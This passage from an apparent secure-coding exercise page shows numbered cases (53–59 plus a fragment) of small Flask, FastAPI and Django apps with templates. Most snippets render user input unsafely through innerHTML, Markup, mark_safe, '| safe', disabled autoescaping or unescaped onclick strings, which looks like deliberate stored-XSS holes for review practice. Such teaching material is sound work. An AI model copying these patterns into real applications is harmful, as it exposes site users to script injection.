class="p">(</span><span class="sh">"</span><span class="s">tickets.html</span><span class="sh">"</span><span class="p">,</span> <span class="n">tickets</span><span class="o">=</span><span class="n">tickets</span><span class="p">)</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- tickets.html --&gt;</span> <span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;head&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">function</span> <span class="nf">showTicket</span><span class="p">(</span><span class="nx">id</span><span class="p">,</span> <span class="nx">subject</span><span class="p">,</span> <span class="nx">message</span><span class="p">,</span> <span class="nx">status</span><span class="p">)</span> <span class="p">{</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">ticket-id</span><span class="dl">"</span><span class="p">).</span><span class="nx">textContent</span> <span class="o">=</span> <span class="nx">id</span><span class="p">;</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">ticket-subject</span><span class="dl">"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">subject</span><span class="p">;</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">ticket-message</span><span class="dl">"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="nx">message</span><span class="p">;</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">ticket-status</span><span class="dl">"</span><span class="p">).</span><span class="nx">textContent</span> <span class="o">=</span> <span class="nx">status</span><span class="p">;</span> <span class="p">}</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/head&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Support Tickets<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"ticket-view"</span><span class="nt">&gt;</span> <span class="nt">&lt;p</span> <span class="na">id=</span><span class="s">"ticket-id"</span><span class="nt">&gt;&lt;/p&gt;</span> <span class="nt">&lt;p</span> <span class="na">id=</span><span class="s">"ticket-subject"</span><span class="nt">&gt;&lt;/p&gt;</span> <span class="nt">&lt;p</span> <span class="na">id=</span><span class="s">"ticket-message"</span><span class="nt">&gt;&lt;/p&gt;</span> <span class="nt">&lt;p</span> <span class="na">id=</span><span class="s">"ticket-status"</span><span class="nt">&gt;&lt;/p&gt;</span> <span class="nt">&lt;/div&gt;</span> <span class="nt">&lt;ul&gt;</span> {% for ticket in tickets %} <span class="nt">&lt;li</span> <span class="na">onclick=</span><span class="s">"showTicket( {{ ticket.id | tojson }}, {{ ticket.subject | tojson }}, {{ ticket.message | tojson }}, {{ ticket.status | tojson }} )"</span><span class="nt">&gt;</span>{{ ticket.subject }}<span class="nt">&lt;/li&gt;</span> {% endfor %} <span class="nt">&lt;/ul&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 53 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># main.py </span><span class="kn">import</span> <span class="n">sqlite3</span> <span class="kn">from</span> <span class="n">fastapi</span> <span class="kn">import</span> <span class="n">FastAPI</span><span class="p">,</span> <span class="n">Request</span> <span class="kn">from</span> <span class="n">fastapi.templating</span> <span class="kn">import</span> <span class="n">Jinja2Templates</span> <span class="kn">from</span> <span class="n">markupsafe</span> <span class="kn">import</span> <span class="n">escape</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">FastAPI</span><span class="p">()</span> <span class="n">templates</span> <span class="o">=</span> <span class="nc">Jinja2Templates</span><span class="p">(</span><span class="n">directory</span><span class="o">=</span><span class="sh">"</span><span class="s">templates</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">get_db</span><span class="p">():</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="nf">connect</span><span class="p">(</span><span class="sh">"</span><span class="s">helpdesk.db</span><span class="sh">"</span><span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="n">row_factory</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="n">Row</span> <span class="k">return</span> <span class="n">conn</span> <span class="k">def</span> <span class="nf">init_db</span><span class="p">():</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"""</span><span class="s"> CREATE TABLE IF NOT EXISTS tickets ( id INTEGER PRIMARY KEY AUTOINCREMENT, name TEXT NOT NULL, issue TEXT NOT NULL ) </span><span class="sh">"""</span><span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="nf">commit</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="nf">init_db</span><span class="p">()</span> <span class="nd">@app.post</span><span class="p">(</span><span class="sh">"</span><span class="s">/ticket</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">submit_ticket</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">Request</span><span class="p">):</span> <span class="n">data</span> <span class="o">=</span> <span class="k">await</span> <span class="n">request</span><span class="p">.</span><span class="nf">json</span><span class="p">()</span> <span class="n">name</span> <span class="o">=</span> <span class="nf">str</span><span class="p">(</span><span class="nf">escape</span><span class="p">(</span><span class="n">data</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">name</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)))</span> <span class="n">issue</span> <span class="o">=</span> <span class="nf">str</span><span class="p">(</span><span class="nf">escape</span><span class="p">(</span><span class="n">data</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">issue</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)))</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sh">"</span><span class="s">INSERT INTO tickets (name, issue) VALUES (?, ?)</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">issue</span><span class="p">)</span> <span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="nf">commit</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">status</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">submitted</span><span class="sh">"</span><span class="p">}</span> <span class="nd">@app.get</span><span class="p">(</span><span class="sh">"</span><span class="s">/tickets</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">view_tickets</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">Request</span><span class="p">):</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">tickets</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"</span><span class="s">SELECT name, issue FROM tickets</span><span class="sh">"</span><span class="p">).</span><span class="nf">fetchall</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">return</span> <span class="n">templates</span><span class="p">.</span><span class="nc">TemplateResponse</span><span class="p">(</span><span class="sh">"</span><span class="s">tickets.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span> <span class="sh">"</span><span class="s">request</span><span class="sh">"</span><span class="p">:</span> <span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">tickets</span><span class="sh">"</span><span class="p">:</span> <span class="n">tickets</span><span class="p">,</span> <span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- tickets.html --&gt;</span> <span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Help Desk Tickets<span class="nt">&lt;/h1&gt;</span> {% for ticket in tickets %} <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"ticket"</span><span class="nt">&gt;</span> <span class="nt">&lt;strong&gt;</span>{{ ticket.name }}<span class="nt">&lt;/strong&gt;</span> <span class="nt">&lt;p&gt;</span>{{ ticket.issue }}<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;/div&gt;</span> {% endfor %} <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 54 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># main.py </span><span class="kn">import</span> <span class="n">sqlite3</span> <span class="kn">from</span> <span class="n">fastapi</span> <span class="kn">import</span> <span class="n">FastAPI</span><span class="p">,</span> <span class="n">Request</span> <span class="kn">from</span> <span class="n">fastapi.templating</span> <span class="kn">import</span> <span class="n">Jinja2Templates</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">FastAPI</span><span class="p">()</span> <span class="n">templates</span> <span class="o">=</span> <span class="nc">Jinja2Templates</span><span class="p">(</span><span class="n">directory</span><span class="o">=</span><span class="sh">"</span><span class="s">templates</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">get_db</span><span class="p">():</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="nf">connect</span><span class="p">(</span><span class="sh">"</span><span class="s">notes.db</span><span class="sh">"</span><span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="n">row_factory</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="n">Row</span> <span class="k">return</span> <span class="n">conn</span> <span class="k">def</span> <span class="nf">init_db</span><span class="p">():</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"""</span><span class="s"> CREATE TABLE IF NOT EXISTS notes ( id INTEGER PRIMARY KEY AUTOINCREMENT, title TEXT NOT NULL, body TEXT NOT NULL ) </span><span class="sh">"""</span><span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="nf">commit</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="nf">init_db</span><span class="p">()</span> <span class="nd">@app.post</span><span class="p">(</span><span class="sh">"</span><span class="s">/note</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">create_note</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">Request</span><span class="p">):</span> <span class="n">data</span> <span class="o">=</span> <span class="k">await</span> <span class="n">request</span><span class="p">.</span><span class="nf">json</span><span class="p">()</span> <span class="n">title</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">title</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">body</span> <span class="o">=</span> <span class="n">data</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">body</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sh">"</span><span class="s">INSERT INTO notes (title, body) VALUES (?, ?)</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="n">title</span><span class="p">,</span> <span class="n">body</span><span class="p">)</span> <span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="nf">commit</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">return</span> <span class="p">{</span><span class="sh">"</span><span class="s">status</span><span class="sh">"</span><span class="p">:</span> <span class="sh">"</span><span class="s">created</span><span class="sh">"</span><span class="p">}</span> <span class="nd">@app.get</span><span class="p">(</span><span class="sh">"</span><span class="s">/notes</span><span class="sh">"</span><span class="p">)</span> <span class="k">async</span> <span class="k">def</span> <span class="nf">view_notes</span><span class="p">(</span><span class="n">request</span><span class="p">:</span> <span class="n">Request</span><span class="p">):</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">notes</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"</span><span class="s">SELECT id, title, body FROM notes</span><span class="sh">"</span><span class="p">).</span><span class="nf">fetchall</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">return</span> <span class="n">templates</span><span class="p">.</span><span class="nc">TemplateResponse</span><span class="p">(</span><span class="sh">"</span><span class="s">notes.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span> <span class="sh">"</span><span class="s">request</span><span class="sh">"</span><span class="p">:</span> <span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">notes</span><span class="sh">"</span><span class="p">:</span> <span class="p">[</span><span class="nf">dict</span><span class="p">(</span><span class="n">n</span><span class="p">)</span> <span class="k">for</span> <span class="n">n</span> <span class="ow">in</span> <span class="n">notes</span><span class="p">],</span> <span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- notes.html --&gt;</span> <span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>My Notes<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;div</span> <span class="na">id=</span><span class="s">"note-display"</span><span class="nt">&gt;&lt;/div&gt;</span> <span class="nt">&lt;ul&gt;</span> {% for note in notes %} <span class="nt">&lt;li</span> <span class="na">onclick=</span><span class="s">"showNote('{{ note.title }}', '{{ note.body }}')"</span><span class="nt">&gt;</span> {{ note.title }} <span class="nt">&lt;/li&gt;</span> {% endfor %} <span class="nt">&lt;/ul&gt;</span> <span class="nt">&lt;script&gt;</span> <span class="kd">function</span> <span class="nf">showNote</span><span class="p">(</span><span class="nx">title</span><span class="p">,</span> <span class="nx">body</span><span class="p">)</span> <span class="p">{</span> <span class="nb">document</span><span class="p">.</span><span class="nf">getElementById</span><span class="p">(</span><span class="dl">"</span><span class="s2">note-display</span><span class="dl">"</span><span class="p">).</span><span class="nx">innerHTML</span> <span class="o">=</span> <span class="dl">"</span><span class="s2">&lt;h2&gt;</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">title</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">&lt;/h2&gt;&lt;p&gt;</span><span class="dl">"</span> <span class="o">+</span> <span class="nx">body</span> <span class="o">+</span> <span class="dl">"</span><span class="s2">&lt;/p&gt;</span><span class="dl">"</span><span class="p">;</span> <span class="p">}</span> <span class="nt">&lt;/script&gt;</span> <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 55 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># app.py </span><span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">render_template</span> <span class="kn">from</span> <span class="n">markupsafe</span> <span class="kn">import</span> <span class="n">Markup</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">Flask</span><span class="p">(</span><span class="n">__name__</span><span class="p">)</span> <span class="n">comments</span> <span class="o">=</span> <span class="p">[]</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/comment</span><span class="sh">"</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">POST</span><span class="sh">"</span><span class="p">])</span> <span class="k">def</span> <span class="nf">post_comment</span><span class="p">():</span> <span class="n">author</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">author</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">body</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">body</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">comments</span><span class="p">.</span><span class="nf">append</span><span class="p">({</span> <span class="sh">"</span><span class="s">author</span><span class="sh">"</span><span class="p">:</span> <span class="nc">Markup</span><span class="p">(</span><span class="n">author</span><span class="p">),</span> <span class="sh">"</span><span class="s">body</span><span class="sh">"</span><span class="p">:</span> <span class="nc">Markup</span><span class="p">(</span><span class="n">body</span><span class="p">),</span> <span class="p">})</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Comment posted.</span><span class="sh">"</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/comments</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">view_comments</span><span class="p">():</span> <span class="k">return</span> <span class="nf">render_template</span><span class="p">(</span><span class="sh">"</span><span class="s">comments.html</span><span class="sh">"</span><span class="p">,</span> <span class="n">comments</span><span class="o">=</span><span class="n">comments</span><span class="p">)</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- comments.html --&gt;</span> <span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Comments<span class="nt">&lt;/h1&gt;</span> {% for comment in comments %} <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"comment"</span><span class="nt">&gt;</span> <span class="nt">&lt;strong&gt;</span>{{ comment.author }}<span class="nt">&lt;/strong&gt;</span> <span class="nt">&lt;p&gt;</span>{{ comment.body }}<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;/div&gt;</span> {% endfor %} <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 56 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># app.py </span><span class="kn">from</span> <span class="n">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">render_template</span> <span class="kn">import</span> <span class="n">sqlite3</span> <span class="n">app</span> <span class="o">=</span> <span class="nc">Flask</span><span class="p">(</span><span class="n">__name__</span><span class="p">)</span> <span class="k">def</span> <span class="nf">get_db</span><span class="p">():</span> <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="nf">connect</span><span class="p">(</span><span class="sh">"</span><span class="s">forum.db</span><span class="sh">"</span><span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="n">row_factory</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="n">Row</span> <span class="k">return</span> <span class="n">conn</span> <span class="k">def</span> <span class="nf">init_db</span><span class="p">():</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"""</span><span class="s"> CREATE TABLE IF NOT EXISTS posts ( id INTEGER PRIMARY KEY AUTOINCREMENT, title TEXT NOT NULL, body TEXT NOT NULL ) </span><span class="sh">"""</span><span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="nf">commit</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="nf">init_db</span><span class="p">()</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/post</span><span class="sh">"</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="sh">"</span><span class="s">POST</span><span class="sh">"</span><span class="p">])</span> <span class="k">def</span> <span class="nf">create_post</span><span class="p">():</span> <span class="n">title</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">title</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">body</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">"</span><span class="s">body</span><span class="sh">"</span><span class="p">,</span> <span class="sh">""</span><span class="p">)</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sh">"</span><span class="s">INSERT INTO posts (title, body) VALUES (?, ?)</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="n">title</span><span class="p">,</span> <span class="n">body</span><span class="p">)</span> <span class="p">)</span> <span class="n">conn</span><span class="p">.</span><span class="nf">commit</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">return</span> <span class="sh">"</span><span class="s">Post created.</span><span class="sh">"</span> <span class="nd">@app.route</span><span class="p">(</span><span class="sh">"</span><span class="s">/posts</span><span class="sh">"</span><span class="p">)</span> <span class="k">def</span> <span class="nf">view_posts</span><span class="p">():</span> <span class="n">conn</span> <span class="o">=</span> <span class="nf">get_db</span><span class="p">()</span> <span class="n">posts</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sh">"</span><span class="s">SELECT title, body FROM posts</span><span class="sh">"</span><span class="p">).</span><span class="nf">fetchall</span><span class="p">()</span> <span class="n">conn</span><span class="p">.</span><span class="nf">close</span><span class="p">()</span> <span class="k">return</span> <span class="nf">render_template</span><span class="p">(</span><span class="sh">"</span><span class="s">posts.html</span><span class="sh">"</span><span class="p">,</span> <span class="n">posts</span><span class="o">=</span><span class="n">posts</span><span class="p">)</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- posts.html --&gt;</span> <span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Forum Posts<span class="nt">&lt;/h1&gt;</span> {% for post in posts %} <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"post"</span><span class="nt">&gt;</span> <span class="nt">&lt;h2&gt;</span>{{ post.title }}<span class="nt">&lt;/h2&gt;</span> <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"body"</span><span class="nt">&gt;</span>{{ post.body | safe }}<span class="nt">&lt;/div&gt;</span> <span class="nt">&lt;/div&gt;</span> {% endfor %} <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 57 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="kn">from</span> <span class="n">django.utils.safestring</span> <span class="kn">import</span> <span class="n">mark_safe</span> <span class="kn">from</span> <span class="n">.models</span> <span class="kn">import</span> <span class="n">Review</span> <span class="k">def</span> <span class="nf">review_list</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">reviews</span> <span class="o">=</span> <span class="n">Review</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">all</span><span class="p">()</span> <span class="n">processed</span> <span class="o">=</span> <span class="p">[]</span> <span class="k">for</span> <span class="n">review</span> <span class="ow">in</span> <span class="n">reviews</span><span class="p">:</span> <span class="n">processed</span><span class="p">.</span><span class="nf">append</span><span class="p">({</span> <span class="sh">"</span><span class="s">author</span><span class="sh">"</span><span class="p">:</span> <span class="nf">mark_safe</span><span class="p">(</span><span class="n">review</span><span class="p">.</span><span class="n">author</span><span class="p">),</span> <span class="sh">"</span><span class="s">stars</span><span class="sh">"</span><span class="p">:</span> <span class="n">review</span><span class="p">.</span><span class="n">stars</span><span class="p">,</span> <span class="sh">"</span><span class="s">body</span><span class="sh">"</span><span class="p">:</span> <span class="nf">mark_safe</span><span class="p">(</span><span class="n">review</span><span class="p">.</span><span class="n">body</span><span class="p">),</span> <span class="p">})</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">reviews.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span><span class="sh">"</span><span class="s">reviews</span><span class="sh">"</span><span class="p">:</span> <span class="n">processed</span><span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- reviews.html --&gt;</span> <span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Customer Reviews<span class="nt">&lt;/h1&gt;</span> {% for review in reviews %} <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"review"</span><span class="nt">&gt;</span> <span class="nt">&lt;strong&gt;</span>{{ review.author }}<span class="nt">&lt;/strong&gt;</span> <span class="nt">&lt;span&gt;</span>{{ review.stars }} stars<span class="nt">&lt;/span&gt;</span> <span class="nt">&lt;p&gt;</span>{{ review.body }}<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;/div&gt;</span> {% endfor %} <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 58 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="kn">from</span> <span class="n">.models</span> <span class="kn">import</span> <span class="n">Announcement</span> <span class="k">def</span> <span class="nf">announcements</span><span class="p">(</span><span class="n">request</span><span class="p">):</span> <span class="n">items</span> <span class="o">=</span> <span class="n">Announcement</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">all</span><span class="p">()</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">announcements.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span><span class="sh">"</span><span class="s">items</span><span class="sh">"</span><span class="p">:</span> <span class="n">items</span><span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- announcements.html --&gt;</span> <span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>Announcements<span class="nt">&lt;/h1&gt;</span> {% autoescape off %} {% for item in items %} <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"announcement"</span><span class="nt">&gt;</span> <span class="nt">&lt;h2&gt;</span>{{ item.title }}<span class="nt">&lt;/h2&gt;</span> <span class="nt">&lt;p&gt;</span>{{ item.body }}<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;small&gt;</span>Posted by: {{ item.author }}<span class="nt">&lt;/small&gt;</span> <span class="nt">&lt;/div&gt;</span> {% endfor %} {% endautoescape %} <span class="nt">&lt;/body&gt;</span> <span class="nt">&lt;/html&gt;</span> </code></pre> </div> <h3> Case 59 </h3> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># views.py </span><span class="kn">from</span> <span class="n">django.shortcuts</span> <span class="kn">import</span> <span class="n">render</span> <span class="kn">from</span> <span class="n">django.utils.html</span> <span class="kn">import</span> <span class="n">format_html</span> <span class="kn">from</span> <span class="n">.models</span> <span class="kn">import</span> <span class="n">Product</span> <span class="k">def</span> <span class="nf">product_detail</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="n">product_id</span><span class="p">):</span> <span class="n">product</span> <span class="o">=</span> <span class="n">Product</span><span class="p">.</span><span class="n">objects</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="nb">id</span><span class="o">=</span><span class="n">product_id</span><span class="p">)</span> <span class="n">badge</span> <span class="o">=</span> <span class="nf">format_html</span><span class="p">(</span><span class="n">product</span><span class="p">.</span><span class="n">badge_html</span><span class="p">)</span> <span class="k">return</span> <span class="nf">render</span><span class="p">(</span><span class="n">request</span><span class="p">,</span> <span class="sh">"</span><span class="s">product.html</span><span class="sh">"</span><span class="p">,</span> <span class="p">{</span> <span class="sh">"</span><span class="s">product</span><span class="sh">"</span><span class="p">:</span> <span class="n">product</span><span class="p">,</span> <span class="sh">"</span><span class="s">badge</span><span class="sh">"</span><span class="p">:</span> <span class="n">badge</span><span class="p">,</span> <span class="p">})</span> </code></pre> </div> <div class="highlight js-code-highlight"> <pre class="highlight html"><code><span class="c">&lt;!-- product.html --&gt;</span> <span class="cp">&lt;!DOCTYPE html&gt;</span> <span class="nt">&lt;html&gt;</span> <span class="nt">&lt;body&gt;</span> <span class="nt">&lt;h1&gt;</span>{{ product.name }}<span class="nt">&lt;/h1&gt;</span> <span class="nt">&lt;p&gt;</span>{{ product.description }}<span class="nt">&lt;/p&gt;</span> <span class="nt">&lt;div</span> <span class="na">class=</span><span class="s">"badge"</span><span class="nt">&gt;</span>{{ badge }}<span 